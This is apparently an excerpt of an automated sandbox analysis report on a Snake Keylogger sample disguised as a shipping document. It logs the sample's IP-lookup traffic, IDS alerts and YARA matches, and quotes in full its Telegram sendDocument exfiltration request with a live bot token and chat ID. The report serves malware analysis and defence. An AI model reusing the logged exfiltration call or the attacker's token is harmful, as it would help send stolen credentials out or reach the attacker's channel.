                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0/sendDocument?chat_id=5649235024&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5e665588b960Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0/sendDocument?chat_id=5649235024&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5e7c51370503Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49715 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49709 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49717 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49736 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49751 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49760 -> 104.21.64.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49711 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49712 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0/sendDocument?chat_id=5649235024&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5e665588b960Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C35000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C1A000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C43000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002B87000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C35000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C1A000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C43000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002B87000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, uyDicX.exe, 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C35000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C1A000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C43000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002B9F000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2091660215.0000000002D9E000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000A.00000002.2122551380.0000000002D03000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: uyDicX.exe, 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: uyDicX.exe, 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0/sendDocument?chat_id=5649
                Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C35000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C1A000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C43000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002B87000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002B87000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: uyDicX.exe, 0000000E.00000002.4499608217.0000000002EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C35000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C1A000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C43000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49785 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49786 version: TLS 1.2

                System Summary

                barindex
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
